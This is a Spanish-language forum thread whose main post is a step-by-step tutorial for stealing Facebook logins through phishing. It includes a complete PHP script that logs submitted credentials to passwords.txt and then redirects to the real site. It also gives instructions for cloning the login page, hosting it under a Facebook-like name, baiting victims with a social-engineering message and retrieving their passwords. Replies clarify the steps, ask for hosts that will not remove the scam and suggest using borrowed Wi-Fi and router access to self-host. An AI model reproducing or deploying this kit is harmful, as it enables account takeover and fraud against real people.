advertencia: No me hago responsable del mal uso que se le pueda dar al contenido aquí expuesta




¿que es el phishing?

Suplantación de identidad.

El termino Phishing es utilizado para referirse a uno de los métodos mas utilizados por delincuentes cibernéticos para estafar y obtener información confidencial de forma fraudulenta como puede ser una contraseña o información detallada sobre tarjetas de crédito u otra información bancaria de la victima.

El estafador, conocido como phisher, se vale de técnicas de ingeniería social, haciéndose pasar por una persona o empresa de confianza en una aparente comunicación oficial electrónica, por lo general un correo electrónico, o algún sistema de mensajería instantánea, redes sociales SMS/MMS, a raíz de un malware o incluso utilizando también llamadas telefónicas. [Enlace externo eliminado para invitados] toda la información de que es el phishing y como protegerse



¿como hackear facebook mediante phishing?



PASO 1: Crear archivo Phishing.php (block de notas )

1. Incluso si usted no tiene ningún conocimiento de archivo PHP simplemente copia el siguiente script y lo guardara como phishing.php


:<?php
header("Location: https://www.facebook.com/login.php"&#41;;
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {fwrite($handle, $variable);fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>



PASO 2 : Creación de página index.html :

1. Abra la página de inicio de sesión de Facebook a continuación , haga clic derecho > Ver código fuente de página y pegarlo en el bloc de notas y guardarlo como
index.html



2. Abra el archivo index.html que con un bloc de notas y búsqueda ( pulsando Ctrl + F ) para: acción en él y sustituir la parte resaltada ( como en la siguiente captura de pantalla) con phishing.php



[[
Imagen




3. Búsqueda ( pulsa Ctrl + F ) para: método en ella y reemplace la parte resaltada (post ) con get




[Enlace externo eliminado para invitados]



4. pon guardar como index.html y hace click donde dice codificación UTF-8

OJO SI LO GUARDAS SIN LA CODIFICACIÓN UTF-8 QUEDARA LA PAGINA CON FALTA DE AUTOGRAFIA Y CON SIGNOS DE PREGUNTA EN TODAS PARTES SI QUE POR ESO GUARDARLO CON CODIFICACIÓN UTF-8






[Enlace externo eliminado para invitados]






PASO 3 : Ahora crea un archivo de texto completamente en blanco con el nombre passwords.txt


Ahora usted tiene todas las siguientes tres archivos con usted:
1. phishing.php
2. index.html
3. passwords.txt






Paso 4 : Ahora tiene que hacer un sitio web



Le recomendé que [Enlace externo eliminado para invitados] porque es completamente gratuito de alojamiento con dominio gratis .

Ir a : [Enlace externo eliminado para invitados] y haga click en donde dice Regístrate y completa lo siguiente como la captura de pantalla


[Enlace externo eliminado para invitados]





2. Ahora vea su cuenta de correo electrónico que usted dio y confirme su cuenta con el enlace de confirmación .





3. subir los archivos (index.html) (passwords.txt) (phishing.php) ya que esten adentro de su cuenta miarroba van donde dice hosting si no lo encuentran entren en [Enlace externo eliminado para invitados] luego van donde dice nuevo espacio dan click saldrá algo así

[Enlace externo eliminado para invitados]



llenan los datos les recomiendo que en Dirección de la página web: pongan algo relacionado con facebook como facebooksoporte o como quieran solo es para hacerlo un poco mas creible





ahora si a subir los archivos (index.html) (passwords.txt) (phishing.php)



van donde dice 1 espacio alado de nuevo espacio dan click y saldrá el nombre que pusieron en Título de la página web bueno le dan en administrar y saldrá algo muy parecido a esto van donde dice webFTP



[Enlace externo eliminado para invitados]






ay dos carpetas hacen click donde dice web abren la carpeta estará sin archivos


[Enlace externo eliminado para invitados]



buno hacen click donde dice subir y marcan el archivo (index.html) ya que se aya subido el index suben el archivo (passwords.txt) y luego el archivo (phishing.php) bueno quedaría algo así





[Enlace externo eliminado para invitados]





AHORA DAN CLICK DONDE DICE INDEX.HTML Y LOS LLEVARA A UNA PAGINA IGUAL A FACEBOOK QUE PARECE LEGITIMA Y LISTO ENVÍAN EL LINK DICIENDO NOSE UN EJEMPLO ME PUEDES AYUDAR CON MI PAGINA DALE ME GUSTA POR FAVOR (ingeniería social)

la pagina falsa


[Enlace externo eliminado para invitados]




AHORA CUANDO LA VICTIMA YA PUSO SU DATOS COMO CORREO ELECTRONICO CONTRASEÑA YA QUE PUSO INICIAR RECIÉN SE VA ALA PAGINA ORINAL DE FACEBOOK


[Enlace externo eliminado para invitados]


[Enlace externo eliminado para invitados]



¿ahora como reviso el correo y la clave que ingreso la victima?




muy fácil ay dos opciones de revisarlas


1. poniendo despues de el url passwords.txt como esta captura



[Enlace externo eliminado para invitados]





2. abren miarroba van donde dice a su hosting creado van donde dice webFTP abren la carpeta web marcan la casilla donde dice passwords.txt hacen click donde dice accion y hacen click donde dice editar

[Enlace externo eliminado para invitados]


[Enlace externo eliminado para invitados]



toda duda del contenido enviarme un mensaje a [email protected]
No entiendo lo que explicas que busquemos en el paso 2º en el bloc de notas, me dice que busquemos: 2. Abra el archivo index.html que con un bloc de notas y búsqueda ( pulsando Ctrl + F ) para: acción en él y sustituir la parte resaltada ( como en la siguiente captura de pantalla) con phishing.php
muy buen tutorial amigo,simple y claro.
CryptoSharex.com  | Aceptando donaciones..gracias: 1CiVFiGwCtf1kpASyQB9j8dhNyJs5AfaMX
KuBrY escribió:tengo un problema con el paso 2º, creo que escribiste mal y no se que buscar en el bloc de notas
Lo que tienes que buscar es la palabra 'action' en el bloc de notas donde copiaste la página de inicio de facebook y remplazar lo que está entre las comillas

action="esto es lo que tienes que remplazar"
action="Phishing.php"

PD: Pensé que era tutorial del amigo @Solitario xD jajajajaja ya se me hacía raro que publicara algo así

Soy lo que soy gracias a que ustedes son lo que soN

Skype: bibetto.hax
Lo mas viejo del mundo.
Muchos frameworks ya ofrecen todo lo que explica @lobo solitario con unos cuantos next next next.
Saludos!
1337 & culture!
KHC escribió:Lo mas viejo del mundo.
Muchos frameworks ya ofrecen todo lo que explica @lobo solitario con unos cuantos next next next.
Saludos!
muy cierto pero en mi caso me gusta manual bro saludos
Adwind, me interesa el metodo que indicas, quieres elaborar en como va, me imagino que es mediante el .php correcto?
CryptoSharex.com  | Aceptando donaciones..gracias: 1CiVFiGwCtf1kpASyQB9j8dhNyJs5AfaMX
Escral escribió:Not working , el host lo detecta como phishing y lo borra , algún host para subir el scam?
Wifi prestada con acceso a la configuración del router para poder redirigir tráfico y abrir puertos a tu ip, y montar un servidor propio con apache por ejemplo, redirigirlo con un dns dinámico, y montarlo en una raspberry pi por el tema del bajó consumo 24x7.
Responder

Volver a “General”